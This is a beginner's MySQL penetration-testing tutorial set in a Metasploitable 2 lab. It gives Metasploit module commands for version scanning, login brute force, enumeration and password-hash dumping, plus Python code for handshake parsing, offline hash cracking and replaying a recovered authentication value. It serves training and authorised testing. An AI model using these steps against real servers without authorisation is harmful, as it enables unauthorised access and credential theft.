Beginner Guide to MySQL Penetration Testing

In this article we perform penetration testing against a MySQL server, carrying out the attack through the Metasploit Framework.

Attacker: Kali Linux
Target: Metasploitable 2

Lets Begin!!

192.168.1.103 is our target IP. First run an Nmap version scan against it to confirm that a MySQL service is actually listening. In the output, port 3306 is open and identified as MySQL.

nmap -sV 192.168.1.103


Now start Metasploit by typing the following command in a Kali terminal:

msfconsole

The mysql_version module enumerates the version of a MySQL server by reading the greeting the server sends as soon as a client connects.

msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set rhosts 192.168.1.103
msf auxiliary(mysql_version) > set rport 3306
msf auxiliary(mysql_version) > exploit

The module reports the version as 5.0.51a-3ubuntu5, which matches the result of the Nmap version scan.
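The version string above comes from the MySQL server greeting (the protocol-10 initial handshake packet) that the server sends before the client says anything. The parser below is an added example, not code from the original article or from Metasploit, and shows what nmap -sV and mysql_version actually read: the version, the connection id, the 20-byte scramble used by password authentication, and the capability flags (SSL support, plugin auth). SAMPLE_HANDSHAKE and SAMPLE_ERROR are constructed by hand (made-up connection id and scramble bytes) so the code runs offline; grab_handshake() fetches a live greeting if you have a target.

```python
"""Parse the MySQL protocol-10 server greeting (initial handshake packet).

Added example, not code from the original article or from Metasploit.
The sample packets are constructed (made-up connection id and scramble).
"""
import socket
import struct

CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SSL = 0x00000800
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000


def build_handshake(version, conn_id, scramble, caps=0xA20C, charset=8, status=2):
    """Assemble a v10 greeting laid out the way a 5.0-era server sends it (test data only)."""
    assert len(scramble) == 20, "MySQL 4.1+ scrambles are 20 bytes"
    body = b"\x0a" + version.encode() + b"\x00"       # protocol 10, NUL-terminated version
    body += struct.pack("<I", conn_id)
    body += scramble[:8] + b"\x00"                    # auth-plugin-data part 1 + filler
    body += struct.pack("<H", caps & 0xFFFF)          # capability flags, lower half
    body += bytes([charset]) + struct.pack("<H", status)
    body += struct.pack("<H", caps >> 16)             # capability flags, upper half
    body += b"\x00" * 11                              # auth_plugin_data_len (0: no plugin auth) + 10 reserved
    body += scramble[8:] + b"\x00"                    # part 2, NUL-terminated
    return len(body).to_bytes(3, "little") + b"\x00" + body


def build_error(code, message):
    """ERR packet a server sends instead of a greeting, e.g. 1130 host not allowed."""
    body = b"\xff" + struct.pack("<H", code) + message.encode()
    return len(body).to_bytes(3, "little") + b"\x00" + body


def parse_handshake(packet):
    """Return the fields a scanner cares about, or {'error': code, 'message': ...}."""
    if len(packet) < 5:
        raise ValueError("packet too short for a MySQL header")
    length = int.from_bytes(packet[:3], "little")      # 3-byte payload length, then sequence id
    body = packet[4:4 + length]
    if len(body) != length:
        raise ValueError("truncated payload: header says %d bytes, got %d" % (length, len(body)))
    if body[0] == 0xFF:
        # Port open, but this source address is refused at the MySQL layer.
        return {"error": struct.unpack_from("<H", body, 1)[0],
                "message": body[3:].decode("utf-8", "replace")}
    if body[0] != 10:
        raise ValueError("unsupported handshake protocol version %d" % body[0])
    end = body.index(b"\x00", 1)
    version = body[1:end].decode("ascii", "replace")
    pos = end + 1
    conn_id = struct.unpack_from("<I", body, pos)[0]
    pos += 4
    scramble = body[pos:pos + 8]
    pos += 9                                          # 8 scramble bytes + 1 filler
    cap_low = struct.unpack_from("<H", body, pos)[0]
    charset = body[pos + 2]
    status = struct.unpack_from("<H", body, pos + 3)[0]
    cap_high = struct.unpack_from("<H", body, pos + 5)[0]
    auth_len = body[pos + 7]                          # 0 on servers without plugin auth
    pos += 18                                         # 7 bytes above + auth_len + 10 reserved
    caps = cap_low | (cap_high << 16)
    if caps & CLIENT_SECURE_CONNECTION:
        part2_len = max(13, auth_len - 8)
        scramble += body[pos:pos + part2_len].split(b"\x00", 1)[0]   # drop trailing NUL
        pos += part2_len
    plugin = None
    if caps & CLIENT_PLUGIN_AUTH:
        plugin = body[pos:body.index(b"\x00", pos)].decode("ascii", "replace")
    return {
        "version": version,
        "connection_id": conn_id,
        "scramble": scramble,
        "capabilities": caps,
        "ssl": bool(caps & CLIENT_SSL),
        "protocol41": bool(caps & CLIENT_PROTOCOL_41),
        "auth_plugin": plugin,                        # None on 5.0, 'mysql_native_password' on 5.5+
        "charset": charset,
        "status": status,
    }


def grab_handshake(host, port=3306, timeout=5.0):
    """Connect and parse the live greeting; the server speaks first, so nothing is sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return parse_handshake(s.recv(4096))


# Constructed samples: a Metasploitable-style banner and a refused host.
SAMPLE_HANDSHAKE = build_handshake("5.0.51a-3ubuntu5", 0x1234, bytes(range(1, 21)))
SAMPLE_ERROR = build_error(1130, "Host '192.168.1.5' is not allowed to connect to this MySQL server")

if __name__ == "__main__":
    print(parse_handshake(SAMPLE_HANDSHAKE))
    print(parse_handshake(SAMPLE_ERROR))
```

The ERR branch matters in practice: a server whose grant tables do not allow your source host answers the TCP connect with error 1130 instead of a greeting, so the port is open and the version is still leaked in Nmap's output only if the server sent it, while the scramble is not. Everything returned by the parser is sent in cleartext before any credentials, which is exactly why version scanning needs no login.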


The mysql_login module tries to log in to the MySQL instance with specific username/password combinations (the default is root with a blank password). Here it is given a username list and a password list to try:

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.103
msf auxiliary(mysql_login) > set rport 3306
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > exploit


The module reports a successful login as root with a blank password: the root account on this server requires no password at all.


The mysql_enum module performs simple enumeration of a MySQL server (version, accounts, privileges and server settings) once it is given valid credentials to connect remotely; the blank root password found above is enough.

msf > use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > set rhost 192.168.1.103
msf auxiliary(mysql_enum) > set username root
msf auxiliary(mysql_enum) > exploit


The mysql_hashdump module extracts the usernames and password hashes from the mysql.user table and stores them as loot for later cracking.

msf > use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.103
msf auxiliary(mysql_hashdump) > set username root
msf auxiliary(mysql_hashdump) > exploit

The output lists each account with its stored password hash. These are hashes, not the passwords themselves, so an account with a non-empty hash still has to be cracked offline (for example with John the Ripper) before the password is usable; an account with an empty hash, like root here, has no password.
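The dumped hashes, the mysql_login check and the blank-root result are all the same mechanism seen from different sides. The following is an added example, not code from the original article or from Metasploit: it reproduces the MySQL 4.1+ mysql_native_password scheme, in which mysql.user stores `'*' + SHA1(SHA1(password))` in hex, the client proves the password against the server's 20-byte scramble without ever sending it, and a dumped hash can be tested offline against a wordlist. It also shows a caveat a practitioner should know: a dumped hash plus one captured login exchange yields the inner SHA1 (stage1), which is all a client needs to authenticate, no cracking required. SAMPLE_SCRAMBLE, SAMPLE_DUMP and SAMPLE_WORDLIST are constructed for the example.

```python
"""MySQL 4.1+ (mysql_native_password) hashing and challenge-response.

Added example, not code from the original article or from Metasploit.
The scramble, dump lines and wordlist below are constructed test data.
"""
import hashlib


def _sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def mysql_native_hash(password: str) -> str:
    """What PASSWORD() stores in mysql.user.password since MySQL 4.1: '*' + SHA1(SHA1(pw))."""
    return "*" + _sha1(_sha1(password.encode())).hex().upper()


def token_from_stage1(stage1: bytes, scramble: bytes) -> bytes:
    """Auth response = stage1 XOR SHA1(scramble + SHA1(stage1)); needs stage1, not the password."""
    mix = _sha1(scramble + _sha1(stage1))
    return bytes(a ^ b for a, b in zip(stage1, mix))


def client_auth_token(password: str, scramble: bytes) -> bytes:
    """What mysql_login or the mysql client sends; empty for a blank password."""
    if password == "":
        return b""
    return token_from_stage1(_sha1(password.encode()), scramble)


def recover_stage1(stored_hash: str, scramble: bytes, token: bytes) -> bytes:
    """The server's view: with stage2 (the stored hash) and the token, stage1 falls out.
    Anyone holding a dumped hash and one sniffed (scramble, token) pair can do the same."""
    stage2 = bytes.fromhex(stored_hash[1:])
    mix = _sha1(scramble + stage2)
    return bytes(a ^ b for a, b in zip(token, mix))


def server_verify(stored_hash: str, scramble: bytes, token: bytes) -> bool:
    """Server-side check: SHA1(recovered stage1) must equal the stored stage2."""
    if stored_hash == "":
        return token == b""                       # blank password, the Metasploitable root case
    if not (stored_hash.startswith("*") and len(stored_hash) == 41 and len(token) == 20):
        return False                              # pre-4.1 16-hex hashes use another scheme
    return _sha1(recover_stage1(stored_hash, scramble, token)) == bytes.fromhex(stored_hash[1:])


def crack(dump_lines, wordlist):
    """Offline wordlist attack on mysql_hashdump-style 'user:hash' lines."""
    found = {}
    for line in dump_lines:
        user, _, stored = line.partition(":")
        if stored == "":
            found[user] = ""                      # no password at all
        elif stored.startswith("*") and len(stored) == 41:
            found[user] = next((w for w in wordlist if mysql_native_hash(w) == stored.upper()), None)
        else:
            found[user] = None                    # old 16-char format or unknown, not handled here
    return found


SAMPLE_SCRAMBLE = b"ABCDEFGHIJKLMNOPQRST"          # constructed; a real scramble is random
SAMPLE_WORDLIST = ["123456", "password", "toor"]
SAMPLE_DUMP = [                                   # constructed loot in hashdump's user:hash form
    "root:",                                      # blank password, as on Metasploitable 2
    "debian-sys-maint:" + mysql_native_hash("password"),
    "guest:" + mysql_native_hash("not-in-the-wordlist"),
    "legacy:6b9a3a2d9f4f1e2c",                    # pre-4.1 format, reported as uncracked
]

if __name__ == "__main__":
    h = mysql_native_hash("password")
    token = client_auth_token("password", SAMPLE_SCRAMBLE)
    print("stored:", h)
    print("login accepted:", server_verify(h, SAMPLE_SCRAMBLE, token))
    print("cracked:", crack(SAMPLE_DUMP, SAMPLE_WORDLIST))
    # Pass-the-hash style: stage1 recovered from one exchange works against a fresh scramble.
    stage1 = recover_stage1(h, SAMPLE_SCRAMBLE, token)
    print("replay with new scramble:", server_verify(h, b"TSRQPONMLKJIHGFEDCBA", token_from_stage1(stage1, b"TSRQPONMLKJIHGFEDCBA")))
```

Two things follow for the engagement. First, the scheme is an unsalted double SHA1, so a dumped hash cracks at raw SHA1 speed and the same password always produces the same hash across servers. Second, because the server itself only needs stage1 to accept a login, treat a captured MySQL authentication exchange plus a hash dump as equivalent to the password for that account.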


We have now gathered a good deal of information with Metasploit, so let's connect to the MySQL server directly with the mysql client in order to dump its data. Type the following command in a terminal:
mysql -h 192.168.1.103 -u root -p
Press Enter at the password prompt, since root has a blank password. We now have access to the MySQL server and can fetch its data.


mysql> show databases;
This lists every database on the server. Let's look at the tables inside the dvwa database:
mysql> show tables from dvwa;


To fetch the data inside the dvwa database, first select it, then list its tables:
mysql> use dvwa;
mysql> show tables;


mysql> select * from users;
This returns every username together with its password hash.
Try the same against the other databases on the server.
